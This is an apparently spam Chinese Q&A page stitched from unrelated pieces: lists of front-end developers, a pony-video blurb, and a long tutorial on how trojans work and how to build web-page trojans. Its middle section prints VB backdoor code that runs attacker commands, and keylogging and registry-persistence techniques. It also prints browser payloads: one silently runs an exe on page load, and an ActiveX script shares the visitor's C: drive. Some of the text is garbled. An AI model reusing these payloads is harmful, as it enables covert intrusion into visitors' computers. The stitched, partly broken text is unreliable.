國(guó)內(nèi)有哪些javascript前端開發(fā)牛人

各有各的牛氣，說說我知道的：

創(chuàng)新互聯(lián)堅(jiān)持“要么做到，要么別承諾”的工作理念，服務(wù)領(lǐng)域包括：成都網(wǎng)站建設(shè)、網(wǎng)站建設(shè)、企業(yè)官網(wǎng)、英文網(wǎng)站、手機(jī)端網(wǎng)站、網(wǎng)站推廣等服務(wù)，滿足客戶于互聯(lián)網(wǎng)時(shí)代的梁溪網(wǎng)站設(shè)計(jì)、移動(dòng)媒體設(shè)計(jì)的需求，幫助企業(yè)找到有效的互聯(lián)網(wǎng)解決方案。努力成為您成熟可靠的網(wǎng)絡(luò)建設(shè)合作伙伴！

JavaScript 語言：周愛民、老趙、玉伯、hax, 月影、CatChen, winter, 白露飛 等等

DOM 和瀏覽器兼容性：winter, 司徒正美、屈超、懌飛 等等

HTML 和 CSS：彪叔、aoao, 懌飛、macji 等等

類庫(kù)框架：玉伯、JK, cnberg, yiminghe, 元彥 等等

前端布道士：克軍、玉伯、懌飛、秦歌、小馬 等等

不知分到哪一類的：hujinpu, 李牧、winter, dexteryy, 李超、老魚、太伯、陳成 等等一堆人

還有游戲領(lǐng)域，F(xiàn)lash 達(dá)人等等，肯定漏了 n 多牛人，歡迎補(bǔ)充。

木馬的制造原理是什么？

朋友，如果你已經(jīng)得到了你想要的答案，希望不要關(guān)閉問題或說沒有你想要的答案，有些問題是沒有正確答案或者很難回答的，希望珍惜大家的幫助！謝謝 （^_^)

這個(gè)問題需要詳細(xì)回答 所以不要嫌多，學(xué)東西哪有容易的。

木馬攻擊原理

特洛伊木馬是一個(gè)程序，它駐留在目標(biāo)計(jì)算機(jī)里，可以隨計(jì)算機(jī)自動(dòng)啟動(dòng)并在某一端口進(jìn)行偵聽，在對(duì)接收的數(shù)據(jù)識(shí)別后，對(duì)目標(biāo)計(jì)算機(jī)執(zhí)行特定的操作。木馬，其實(shí)質(zhì)只是一個(gè)通過端口進(jìn)行通信的網(wǎng)絡(luò)客戶/服務(wù)程序。

1、基本概念:網(wǎng)絡(luò)客戶/服務(wù)模式的原理是一臺(tái)主機(jī)提供服務(wù)(服務(wù)器)，另一臺(tái)主機(jī)接受服務(wù)(客戶機(jī))。作為服務(wù)器的主機(jī)一般會(huì)打開一個(gè)默認(rèn)的端口并進(jìn)行監(jiān)聽(Listen), 如果有客戶機(jī)向服務(wù)器的這一端口提出連接請(qǐng)求(Connect Request), 服務(wù)器上的相應(yīng)程序就會(huì)自動(dòng)運(yùn)行，來應(yīng)答客戶機(jī)的請(qǐng)求，這個(gè)程序稱為守護(hù)進(jìn)程(UNIX的術(shù)語,不過已經(jīng)被移植到了MS系統(tǒng)上)。對(duì)于特洛伊木馬，被控制端就成為一臺(tái)服務(wù)器，控制端則是一臺(tái)客戶機(jī)，G_server.exe是守護(hù)進(jìn)程, G_client是客戶端應(yīng)用程序。

2、程序?qū)崿F(xiàn):

可以使用VB或VC的Winsock控件來編寫網(wǎng)絡(luò)客戶/服務(wù)程序, 實(shí)現(xiàn)方法如下:

服務(wù)器端:

G_Server.LocalPort=7626(冰河的默認(rèn)端口,可以改為別的值)

G_Server.Listen(等待連接)

客戶端:

G_Client.RemoteHost=ServerIP(設(shè)遠(yuǎn)端地址為服務(wù)器地址)

G_Client.RemotePort=7626(設(shè)遠(yuǎn)程端口為冰河的默認(rèn)端口)

(在這里可以分配一個(gè)本地端口給G_Client, 如果不分配, 計(jì)算機(jī)將會(huì)自動(dòng)分配一個(gè))

G_Client.Connect(調(diào)用Winsock控件的連接方法)

一旦服務(wù)端接到客戶端的連接請(qǐng)求ConnectionRequest,就接受連接

Private Sub G_Server_ConnectionRequest(ByVal requestID As Long)

G_Server.Accept requestID

End Sub

客戶端用G_Client.SendData發(fā)送命令,而服務(wù)器在G_Server_DateArrive事件中接受并執(zhí)行命令(幾乎所有的木馬功能都在這個(gè)事件處理程序中實(shí)現(xiàn))

如果客戶斷開連接,則關(guān)閉連接并重新監(jiān)聽端口

Private Sub G_Server_Close()

G_Server.Close (關(guān)閉連接)

G_Server.Listen(再次監(jiān)聽)

End Sub

客戶端上傳一個(gè)命令，服務(wù)端解釋并執(zhí)行命令。

3、實(shí)現(xiàn)木馬的控制功能

由于Win98開放了所有的權(quán)限給用戶，因此，以用戶權(quán)限運(yùn)行的木馬程序幾乎可以控制一切，下面僅對(duì)木馬的主要功能進(jìn)行簡(jiǎn)單的概述, 主要是使用Windows API函數(shù)。

（1）遠(yuǎn)程監(jiān)控(控制對(duì)方鼠標(biāo)、鍵盤，并監(jiān)視對(duì)方屏幕)

keybd_event模擬一個(gè)鍵盤動(dòng)作。

mouse_event模擬一次鼠標(biāo)事件

mouse_event(dwFlags,dx,dy,cButtons,dwExtraInfo)dwFlags:

MOUSEEVENTF_ABSOLUTE 指定鼠標(biāo)坐標(biāo)系統(tǒng)中的一個(gè)絕對(duì)位置

MOUSEEVENTF_MOVE 移動(dòng)鼠標(biāo)

MOUSEEVENTF_LEFTDOWN 模擬鼠標(biāo)左鍵按下

MOUSEEVENTF_LEFTUP 模擬鼠標(biāo)左鍵抬起

MOUSEEVENTF_RIGHTDOWN 模擬鼠標(biāo)右鍵按下

MOUSEEVENTF_RIGHTUP 模擬鼠標(biāo)右鍵按下

dx,dy:MOUSEEVENTF_ABSOLUTE中的鼠標(biāo)坐標(biāo)

（2）記錄各種口令信息

keylog begin：將擊鍵記錄在一個(gè)文本文件里，同時(shí)還記錄執(zhí)行輸入的窗口名

（3）獲取系統(tǒng)信息

a.取得計(jì)算機(jī)名 GetComputerName

b.更改計(jì)算機(jī)名 SetComputerName

c.當(dāng)前用戶 GetUserName

d.系統(tǒng)路徑

Set FileSystem0bject = CreateObject("Scripting.FileSystemObject")(建立文件系統(tǒng)對(duì)象)

Set SystemDir = FileSystem0bject.getspecialfolder(1)(取系統(tǒng)目錄)

Set SystemDir = FileSystem0bject.getspecialfolder(0)(取Windows安裝目錄)

e.取得系統(tǒng)版本 GetVersionEx

f.當(dāng)前顯示分辨率

Width = screen.Width\ screen.TwipsPerPixelX

Height= screen.Height \ screen.TwipsPerPixelY

（4）限制系統(tǒng)功能

a.遠(yuǎn)程關(guān)機(jī)或重啟計(jì)算機(jī),使用WinAPI中的如下函數(shù)可以實(shí)現(xiàn):

ExitWindowsEx(UINT uFlags,DWORD dwReserved)

當(dāng)uFlags=EWX_LOGOFF 中止進(jìn)程，然后注銷

=EWX_SHUTDOWN 關(guān)掉系統(tǒng)但不關(guān)電源

=EWX_REBOOT 重新引導(dǎo)系統(tǒng)

=EWX_FORCE強(qiáng)迫中止沒有響應(yīng)的進(jìn)程

=EWX_POWERDOWN 關(guān)掉系統(tǒng)及關(guān)閉電源

b.鎖定鼠標(biāo),ClipCursor(lpRect As RECT)可以將指針限制到指定區(qū)域,或者用ShowCursor(FALSE)把鼠標(biāo)隱藏起來也可以，RECT是定義的一個(gè)矩形。

c.讓對(duì)方掉線 RasHangUp

d.終止進(jìn)程 ExitProcess

e.關(guān)閉窗口 利用FindWindow函數(shù)找到窗口并利用SendMessage函數(shù)關(guān)閉窗口

（5）遠(yuǎn)程文件操作

刪除文件：File delete

拷貝文件：File copy

共享文件：Export list（列出當(dāng)前共享的驅(qū)動(dòng)器、目錄、權(quán)限及共享密碼）

（6）注冊(cè)表操作

在VB中只要Set RegEdit=CreateObject（"WScript.Shell")就可以使用以下的注冊(cè)表功能:

刪除鍵值:RegEdit.RegDelete RegKey

增加鍵值:RegEdit.Write RegKey,RegValue

獲取鍵值:RegEdit.RegRead (Value)

三、特洛伊木馬隱身方法

木馬程序會(huì)想盡一切辦法隱藏自己，主要途徑有：在任務(wù)欄中隱藏自己，這是最基本的只要把Form的Visible屬性設(shè)為False、ShowInTaskBar設(shè)為False，程序運(yùn)行時(shí)就不會(huì)出現(xiàn)在任務(wù)欄中了。在任務(wù)管理器中隱形：將程序設(shè)為“系統(tǒng)服務(wù)”可以偽裝自己。當(dāng)然它也會(huì)悄無聲息地啟動(dòng)，木馬會(huì)在每次用戶啟動(dòng)時(shí)自動(dòng)裝載服務(wù)端，Windows系統(tǒng)啟動(dòng)時(shí)自動(dòng)加載應(yīng)用程序的方法，“木馬”都會(huì)用上，如：?jiǎn)?dòng)組、win.ini、system.ini、注冊(cè)表等等都是“木馬”藏身的好地方。

在win.ini文件中，在[WINDOWS]下面，“run=”和“l(fā)oad=”是可能加載“木馬”程序的途徑，一般情況下，它們的等號(hào)后面什么都沒有，如果發(fā)現(xiàn)后面跟有路徑與文件名不是你熟悉的啟動(dòng)文件，你的計(jì)算機(jī)就可能中上“木馬”了。當(dāng)然你也得看清楚，因?yàn)楹枚唷澳抉R”，如“AOL Trojan木馬”，它把自身偽裝成command.exe文件，如果不注意可能不會(huì)發(fā)現(xiàn)它不是真正的系統(tǒng)啟動(dòng)文件。

在system.ini文件中，在[BOOT]下面有個(gè)“shell=文件名”。正確的文件名應(yīng)該是“explorer.exe”，如果不是“explorer.exe”，而是“shell= explorer.exe 程序名”，那么后面跟著的那個(gè)程序就是“木馬”程序，就是說你已經(jīng)中“木馬”了。

在注冊(cè)表中的情況最復(fù)雜，通過regedit命令打開注冊(cè)表編輯器，在點(diǎn)擊至：“HKEY－LOCAL－MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”目錄下，查看鍵值中有沒有自己不熟悉的自動(dòng)啟動(dòng)文件，擴(kuò)展名為EXE，這里切記：有的“木馬”程序生成的文件很像系統(tǒng)自身文件，想通過偽裝蒙混過關(guān)，如“Acid Battery v1.0木馬”，它將注冊(cè)表“HKEY－LOCAL－MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”下的 Explorer 鍵值改為Explorer=“C:\WINDOWS\expiorer.exe”，“木馬”程序與真正的Explorer之間只有“i”與“l(fā)”的差別。當(dāng)然在注冊(cè)表中還有很多地方都可以隱藏“木馬”程序，如：“HKEY－CURRENT－USER\Software\Microsoft\Windows\CurrentVersion\Run”、“HKEY－USERS\＊＊＊＊\Software\Microsoft\Windows\CurrentVersion\Run”的目錄下都有可能，最好的辦法就是在“HKEY－LOCAL－MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”下找到“木馬”程序的文件名，再在整個(gè)注冊(cè)表中搜索即可。

目前,除了上面介紹的隱身技術(shù)外,更新、更隱蔽的方法已經(jīng)出現(xiàn)，那就是-驅(qū)動(dòng)程序及動(dòng)態(tài)鏈接庫(kù)技術(shù)。驅(qū)動(dòng)程序及動(dòng)態(tài)鏈接庫(kù)技術(shù)和一般的木馬不同，它基本上擺脫了原有的木馬模式-監(jiān)聽端口，而采用替代系統(tǒng)功能的方法（改寫驅(qū)動(dòng)程序或動(dòng)態(tài)鏈接庫(kù)）。這樣做的結(jié)果是：系統(tǒng)中沒有增加新的文件（所以不能用掃描的方法查殺）、不需要打開新的端口（所以不能用端口監(jiān)視的方法查殺）、沒有新的進(jìn)程（所以使用進(jìn)程查看的方法發(fā)現(xiàn)不了它，也不能用kill進(jìn)程的方法終止它的運(yùn)行）。在正常運(yùn)行時(shí)木馬幾乎沒有任何的癥狀,而一旦木馬的控制端向被控端發(fā)出特定的信息后,隱藏的程序就立即開始運(yùn)作。

四、 特洛伊木馬防御原理

知道了木馬的攻擊原理和隱身方法，我們就可以采取措施進(jìn)行防御了。

1.端口掃描

端口掃描是檢查遠(yuǎn)程機(jī)器有無木馬的最好辦法, 端口掃描的原理非常簡(jiǎn)單, 掃描程序嘗試連接某個(gè)端口, 如果成功, 則說明端口開放,如果失敗或超過某個(gè)特定的時(shí)間(超時(shí)), 則說明端口關(guān)閉。但對(duì)于驅(qū)動(dòng)程序/動(dòng)態(tài)鏈接木馬, 掃描端口是不起作用的。

2.查看連接接

查看連和端口掃描的原理基本相同，不過是在本地機(jī)上通過netstat -a（或某個(gè)第三方程序）查看所有的TCP/UDP連接，查看連接要比端口掃描快，但同樣是無法查出驅(qū)動(dòng)程序/動(dòng)態(tài)鏈接木馬,而且僅僅能在本地使用。

3.檢查注冊(cè)表

上面在討論木馬的啟動(dòng)方式時(shí)已經(jīng)提到，木馬可以通過注冊(cè)表啟動(dòng)（好像現(xiàn)在大部分的木馬都是通過注冊(cè)表啟動(dòng)的，至少也把注冊(cè)表作為一個(gè)自我保護(hù)的方式），那么，我們同樣可以通過檢查注冊(cè)表來發(fā)現(xiàn)冰河在注冊(cè)表里留下的痕跡。

4.查找文件

查找木馬特定的文件也是一個(gè)常用的方法，木馬的一個(gè)特征文件是kernl32.exe,另一個(gè)是sysexlpr.exe，只要?jiǎng)h除了這兩個(gè)文件,木馬就已經(jīng)不起作用了。如果你只是刪除了sysexlpr.exe而沒有做掃尾工作的話,可能會(huì)遇到一些麻煩-就是你的文本文件打不開了, sysexplr.exe是和文本文件關(guān)聯(lián)的,你還必須把文本文件跟notepad關(guān)聯(lián)上。

另外，對(duì)于驅(qū)動(dòng)程序/動(dòng)態(tài)鏈接庫(kù)木馬，有一種方法可以試試，使用Windows的"系統(tǒng)文件檢查器"，通過"開始菜單"-"程序"-"附件"-"系統(tǒng)工具"-"系統(tǒng)信息"-"工具"可以運(yùn)行"系統(tǒng)文件檢查器", 用“系統(tǒng)文件檢查器”可檢測(cè)操作系統(tǒng)文件的完整性，如果這些文件損壞，檢查器可以將其還原，檢查器還可以從安裝盤中解壓縮已壓縮的文件（如驅(qū)動(dòng)程序）。如果你的驅(qū)動(dòng)程序或動(dòng)態(tài)鏈接庫(kù)在你沒有升級(jí)它們的情況下被改動(dòng)了,就有可能是木馬(或者損壞了),提取改動(dòng)過的文件可以保證你的系統(tǒng)安全和穩(wěn)定。

制作網(wǎng)頁木馬原理

大家對(duì)木馬都不陌生了，它可能要算是計(jì)算機(jī)病毒史上最厲害的了，相信會(huì)使木馬的人千千萬萬，但是有很多人苦于怎么把木馬發(fā)給對(duì)方，現(xiàn)在隨著計(jì)算機(jī)的普及，在網(wǎng)絡(luò)上我相信很少有人會(huì)再輕易的接收對(duì)方的文件了，所以網(wǎng)頁木馬誕生了。

1.它應(yīng)該算是html帶動(dòng)同路徑下的一個(gè)exe的文件的主頁了，也就是當(dāng)瀏覽器瀏覽這個(gè)頁面的時(shí)候，一個(gè)exe的文件就在后臺(tái)自動(dòng)下載并執(zhí)行了，可以做一個(gè)test.html的文件在桌面，內(nèi)容如下：

script language="javascript"

run_exe="OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""

run_exe+="CODEBASE=\"test.exe#version=1,1,1,1\""

run_exe+="PARAM NAME=\"_Version\" value=\"65536\""

run_exe+="/OBJECT"

run_exe+="HTMLH1網(wǎng)頁加載中，請(qǐng)稍后..../H1/HTML";

document.open();

document.clear();

document.writeln(run_exe);

document.close();

/script

再在桌面下隨便找個(gè)exe的文件，名字一定要改為tset.exe，好了，這時(shí)候雙擊我們剛才生成的html文件，當(dāng)看到“網(wǎng)頁加載中，請(qǐng)稍后....”的時(shí)候，我們的那個(gè)同路徑下的exe文件也被無條件執(zhí)行了，這種頁面的優(yōu)點(diǎn)就是編譯修改簡(jiǎn)單，但是！當(dāng)你申請(qǐng)下了一個(gè)個(gè)人主頁空間的時(shí)候，把這兩個(gè)文件上傳上去的時(shí)候，當(dāng)你試圖通過瀏覽器瀏覽你的杰作的時(shí)候，ie的安全警告跳了出來，我想沒有幾個(gè)人愿意乖乖的冒著風(fēng)險(xiǎn)去點(diǎn)“是”，好了，盡管這個(gè)網(wǎng)頁木馬在本地是多么的完美，但是放到了網(wǎng)上就通不過ie的安全策略了，這個(gè)小馬失敗了。

2.是通過ie自身的漏洞寫入注冊(cè)表，相信很多人經(jīng)常在瀏覽一些主頁的時(shí)候，注冊(cè)表被改的亂七八糟、ie標(biāo)題被改、首頁被改、注冊(cè)表編輯器被禁用等等，這些都是自動(dòng)修改了你的注冊(cè)表的網(wǎng)頁的杰作，所以我門也可以做個(gè)頁面讓瀏覽者的硬盤完全共享，也是做個(gè)html的文件，內(nèi)容如下：

script language=javascript

document.write("APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent/APPLET");

function f(){

a1=document.applets[0];

a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");

a1.createInstance();

Shl = a1.GetObject();

Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Flags",402,"REG_DWORD");

Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Type",0,"REG_DWORD"

);

Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Path","C:\\");

}

function init()

{

setTimeout("f()", 1000);

}

init();

/script

當(dāng)對(duì)方的瀏覽過這個(gè)頁面的時(shí)候，他的c:就被共享了，共享后的進(jìn)入方法嘛..呵呵不用說了吧，但是他雖然被共巷了，但是你還不知道誰正在看你的這個(gè)頁面，他的ip又是多少你都不知道，沒有關(guān)系，有個(gè)很簡(jiǎn)單的方法，去163申請(qǐng)一個(gè)域名的轉(zhuǎn)換，如：連接目標(biāo)地址里...褪槍蠶砹?恿恕?/a

這種網(wǎng)頁木馬的特點(diǎn)是比較安全，不宜被對(duì)方發(fā)現(xiàn)，但是使用麻煩需要牽扯到很多的東西。

3.也是現(xiàn)在最好用的一種了吧，個(gè)人認(rèn)為。它是將一個(gè)小巧的exe文件作成一個(gè).eml的文件，再用ie的漏洞讓一個(gè)html的頁面執(zhí)行這個(gè).eml的文件，你的那個(gè)小巧的exe文件就被執(zhí)行了，由于代碼過長(zhǎng)又因每個(gè)exe文件轉(zhuǎn)換后的代碼不同所以不可能一一寫出，下面給出一個(gè)地址實(shí)際上就是一個(gè)轉(zhuǎn)...憧梢醞ü齮elnet x.x.x.x 3389來完全控制對(duì)方（這個(gè)5k的小后門是winshell5.0黑白網(wǎng)絡(luò)有下，同時(shí)這個(gè)winshell5.0還有一個(gè)很出色的功能，就是能下載一個(gè)你事先設(shè)置好的指定路徑下的一個(gè)文件，并執(zhí)行他，我放置的是網(wǎng)絡(luò)深偷，如果你的殺毒軟件夠厲害的話，神偷是可以被查出來的，這里只是實(shí)驗(yàn)，實(shí)際中可以指定很多查不到的小馬，這里不闡述），有興趣的朋友可以來試試。

這種網(wǎng)頁木馬的特點(diǎn)是，對(duì)方挨種率較高，除了制作麻煩一點(diǎn)外，沒有什么缺點(diǎn)啦

好了所有的漏洞都是建立在系統(tǒng)漏洞的前提下，多升級(jí)多打補(bǔ)丁沒有壞處

國(guó)內(nèi)有哪些前端開發(fā)牛人？

目前隨著科技的發(fā)展，國(guó)家的進(jìn)步，各行各樣涌現(xiàn)出了許許多多的人才與前段開發(fā)牛人

今天就介紹一些行業(yè)的前段開發(fā)牛人

avaScript語言：周愛民、老趙、玉伯、hax,月影、CatChen, winter, 白露飛 等等

DOM 和瀏覽器兼容性：winter, 司徒正美、屈超、懌飛 等等

HTML 和 CSS：彪叔、aoao, 懌飛、macji 等等

類庫(kù)框架：玉伯、JK, cnberg, yiminghe, 元彥 等等

前端布道士：克軍、玉伯、懌飛、秦歌、小馬 等等

不知分到哪一類的：hujinpu, 李牧、winter,dexteryy, 李超、老魚、太伯、陳成 等等一堆人

百度的玉北，GrayZhang，攜程的大漠，林小志，前段亂燉的芋頭

云適配的陳本峰 javascript還有一個(gè)不會(huì)營(yíng)銷的大牛，席新亮，是很多群的群主，天天回答js問題，不過很少在論壇和博客上看到它。土豆前端開發(fā)工程師：西點(diǎn)王子-知乎

知乎專欄：web前端開發(fā)知乎專欄目

《鋒利的jquery 作者》 - 單東林。不敢說多牛，但是是我敬佩的師傅。

林小志大神。從小看《css那些事兒》長(zhǎng)大的

：還有#@just.jayac到他的關(guān)于頁面，很有Geek風(fēng)格總之，現(xiàn)在的前段牛人各行各業(yè)都有很多了。不僅僅只是限于騰訊與淘寶的科技開發(fā)人員了。更多的活躍于flash與游戲領(lǐng)域。只要大家多多發(fā)掘，也可以認(rèn)識(shí)許許多多的牛人大神。

我的世界小馬寶莉js

鏈接：

提取碼：4EZr

這里有小馬寶莉全系列1-7季的全部視頻，希望能幫到您。

小馬寶莉:友誼是魔法(My?Little?Pony:?Friendship?is?Magic)由美國(guó)玩具商孩之寶于2010年10月10日在美國(guó)探索家庭電視頻道開始播出的卡通影集，共221集。故事敘述了小馬Twilight?Sparkle(紫悅/暮光閃閃)為了執(zhí)行導(dǎo)師Princess?Celestia(宇宙公主/塞拉絲蒂婭公主)給她的任務(wù)，與助手Spike(穗龍/斯派克)一起來到Ponyville(小馬谷/小馬鎮(zhèn))學(xué)習(xí)有關(guān)友誼魔法的知識(shí)，在學(xué)習(xí)和生活的過程中她結(jié)識(shí)了五位好朋友，并獲得了真正的友誼，與朋友們共同守護(hù)Equestria(小馬利亞/小馬國(guó))。

小馬寶莉一般指的是小馬寶莉:友誼是魔法(Mylittle?Pony:?Friendship?is?Magic)，這是整個(gè)系列中的第四代(Generation?4)。"小馬寶莉"是系列的第四代的官方譯名，在此之前的幾代曾被稱作"小馬駒"或"我的小馬駒"。